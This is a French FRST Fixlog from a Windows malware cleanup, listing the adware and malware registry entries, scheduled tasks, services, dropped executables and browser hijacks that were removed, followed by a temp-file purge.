HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\Run\\nXup0B4OdvyH0.exe => valeur supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\Run\\setupsk_upd => valeur supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\Run\\setupsk => valeur supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\Run\\r7NastVh.exe => valeur supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\Run\\kq6SJhy3.exe => valeur supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Jw-H1hKwj9.exe => valeur supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\User => déplacé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => valeur restauré(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{29BBDE1B-EB8D-478D-8B3B-016B68320D6A} => clé supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{29BBDE1B-EB8D-478D-8B3B-016B68320D6A} => clé non trouvé(e). 
HKU\S-1-5-21-253373114-394791922-1694590359-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => clé non trouvé(e). 
HKU\S-1-5-21-253373114-394791922-1694590359-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C74A07A0-FCF0-4AC1-BE75-EFFDA5C090DA} => clé supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{C74A07A0-FCF0-4AC1-BE75-EFFDA5C090DA} => clé non trouvé(e). 
HKU\S-1-5-21-253373114-394791922-1694590359-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => clé supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => clé non trouvé(e). 
Firefox DefaultSearchEngine supprimé(es) avec succès
Firefox SelectedSearchEngine supprimé(es) avec succès
Firefox "homepage" supprimé(es) avec succès
Firefox "newtab" supprimé(es) avec succès
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-03-10] => Erreur: Pas de correction automatique trouvée pour cet élément.
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\aohghmighlieiainnegkcijnfilokake [2016-03-10] => Erreur: Pas de correction automatique trouvée pour cet élément.
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-03-10] => Erreur: Pas de correction automatique trouvée pour cet élément.
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-03-10] => Erreur: Pas de correction automatique trouvée pour cet élément.
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-03-10] => Erreur: Pas de correction automatique trouvée pour cet élément.
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15] => Erreur: Pas de correction automatique trouvée pour cet élément.
HKU\.DEFAULT\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => clé supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => clé supprimé(es) avec succès
HKU\S-1-5-18\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => clé non trouvé(e). 
HKLM\System\CurrentControlSet\Services\BIT => clé supprimé(es) avec succès
BIT => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\OtherSearch => clé supprimé(es) avec succès
OtherSearch => service supprimé(es) avec succès
SMUpdd => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\SMUpdd => clé supprimé(es) avec succès
SMUpdd => service supprimé(es) avec succès
C:\ProgramData\smp2.exe => déplacé(es) avec succès
C:\Program Files (x86)\8fdCaBIXshPn => déplacé(es) avec succès
C:\WINDOWS\Tasks\Updater_Online_Application.job => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_323131373234303836342d504a2d414534372a5a6c785a => déplacé(es) avec succès
C:\Users\clément\Desktop\Поиcк в Интeрнете.lnk => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Поиcк в Интeрнете => déplacé(es) avec succès
C:\WINDOWS\Tasks\uuxHwpnMkRCRpJh.job => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\TnqpiRJoXWMCwN => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\uuxHwpnMkRCRpJh2 => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\uuxHwpnMkRCRpJh => déplacé(es) avec succès
C:\Users\clément\AppData\Local\7ab808e7e265451a9a961b49b0ef77d8 => déplacé(es) avec succès
C:\Users\clément\AppData\Local\2fc67d35b08c4665bd605658465b1d3c => déplacé(es) avec succès
C:\Users\clément\AppData\Local\c2adc913dfa241e8b171d92b7c36524e => déplacé(es) avec succès
C:\Users\clément\Desktop\Искать в Интернете.url => déplacé(es) avec succès
C:\WINDOWS\62ecf9df28efb411595ec052a5ab1411.exe => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\4bc9434eabe7ae6262307ce569896941.sys => déplacé(es) avec succès
C:\Users\clément\AppData\Roaming\gplyra\gplyra.exe => déplacé(es) avec succès
C:\Windows\Temp\g22D0.tmp.exe => déplacé(es) avec succès
"C:\ProgramData\smp2.exe" => non trouvé(e).
C:\Users\clément\AppData\Local\Temp\0PElKGkBfiep.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\7nfIWjFPkFOn.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\Bass.dll => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\Bass.Net.dll => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\CH.dll => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\dllnt_dump.dll => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\Dxx2AtYBegoK.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\fBb6Vj4fXUzS.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\IHRG0VO4PBcn.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\Infinity-Setup.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\JdbKIpb6vI0f.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\JT7ZHmgGYbIF.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\kYJgxC6gFnlK.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\NCqIsMlXm77C.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\NQXP3X5pqegX.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\O9AnFlIA66Dd.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\OWrBOy3ApMNH.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\oylIeKJHIOG2.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\r49hvX0ufQBZ.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\U1qgVwRRQ8YV.exe => déplacé(es) avec succès
C:\Windows\Temp\g488B.tmp.exe => déplacé(es) avec succès
C:\Users\clément\AppData\Local\Temp\San7706.tmp => déplacé(es) avec succès
VidsqaurE (HKLM-x32\...\{A97606DF-0FE1-4390-B0DD-ADA8B303AE61}_is1) (Version: 1.4 - ) => Erreur: Pas de correction automatique trouvée pour cet élément.
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => clé supprimé(es) avec succès
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => clé non trouvé(e). 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{02EB31D7-2140-49E7-A2DA-A4C618D17A15} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{02EB31D7-2140-49E7-A2DA-A4C618D17A15} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\SMW_P => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_P => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2B630765-11F6-4BA6-91C1-7BD75E92351C} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2B630765-11F6-4BA6-91C1-7BD75E92351C} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\IBUpd2 => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd2 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6CC0C9CE-7F1F-4603-9D8B-D009F34BD8CB} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6CC0C9CE-7F1F-4603-9D8B-D009F34BD8CB} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\TnqpiRJoXWMCwN => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TnqpiRJoXWMCwN => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7B628BCB-B7F5-4DAF-909A-28E68C04D9EB} => clé non trouvé(e). 
C:\WINDOWS\System32\Tasks\109b523744e1e28bdc9f2ee6afee13b8 => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\109b523744e1e28bdc9f2ee6afee13b8 => clé non trouvé(e). 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{B21D10A3-74FF-4AF7-A5AE-12AED634C7C2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B21D10A3-74FF-4AF7-A5AE-12AED634C7C2} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\S3 IDI => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\S3 IDI => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{BBD25275-05BE-451E-9A15-6CE5D0547FA2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BBD25275-05BE-451E-9A15-6CE5D0547FA2} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Firetaskia => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Firetaskia => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C01E1FAB-ECE6-415D-A7C6-14DB878A4EFE} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01E1FAB-ECE6-415D-A7C6-14DB878A4EFE} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Updater_Online_Application => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater_Online_Application => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C3046A84-442F-4681-939C-140D250BE270} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3046A84-442F-4681-939C-140D250BE270} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\uuxHwpnMkRCRpJh2 => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\uuxHwpnMkRCRpJh2 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D12A70F2-BDAB-47FB-895D-A7E2AD79FA5A} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D12A70F2-BDAB-47FB-895D-A7E2AD79FA5A} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Online Application V2G1 => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G1 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D26734E5-EFCD-4986-BD23-6A055E79BD4C} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D26734E5-EFCD-4986-BD23-6A055E79BD4C} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\IBUpd => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{EC4C6F62-B9E6-45BD-A787-B3448B117F0C} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC4C6F62-B9E6-45BD-A787-B3448B117F0C} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\RegisterObject => clé supprimé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G1.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G2.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Online Application V2G3.job => déplacé(es) avec succès
C:\WINDOWS\Tasks\Updater_Online_Application.job => non trouvé(e).
C:\WINDOWS\Tasks\uuxHwpnMkRCRpJh.job => non trouvé(e).
C:\Users\clément\Desktop\Вoйти в Интeрнет.lnk => déplacé(es) avec succès
C:\Users\clément\Desktop\Поиcк в Интeрнете.lnk => non trouvé(e).
C:\Users\clément\Desktop\Logiciels\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
C:\Users\clément\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk => Raccourci argument supprimé(es) avec succès.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => Raccourci argument supprimé(es) avec succès.
"C:\WINDOWS\TEMP\g488B.tmp.exe" => non trouvé(e).
"C:\Users\clément\AppData\Local\Temp\San7706.tmp" => non trouvé(e).
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{21ECB531-57E9-4FE2-8D71-F70F6174AFC9} => valeur supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9BDF2A52-A726-4A4D-A861-D6E13822B285} => valeur supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D5F22F3F-C49E-4E91-B603-25EA38CEF951} => valeur supprimé(es) avec succès

=========== EmptyTemp: ==========

BITS transfer queue => 8413184 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 14167669 B
Java, Flash, Steam htmlcache => 131941 B
Windows/system/drivers => 1817685 B
Edge => 22690900 B
Chrome => 4980736 B
Firefox => 16408489 B
Opera => 337345348 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 124943 B
systemprofile32 => 128 B
LocalService => 4142 B
NetworkService => 0 B
clément => 266086590 B

RecycleBin => 0 B
EmptyTemp: => 641 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 12:03:40 ====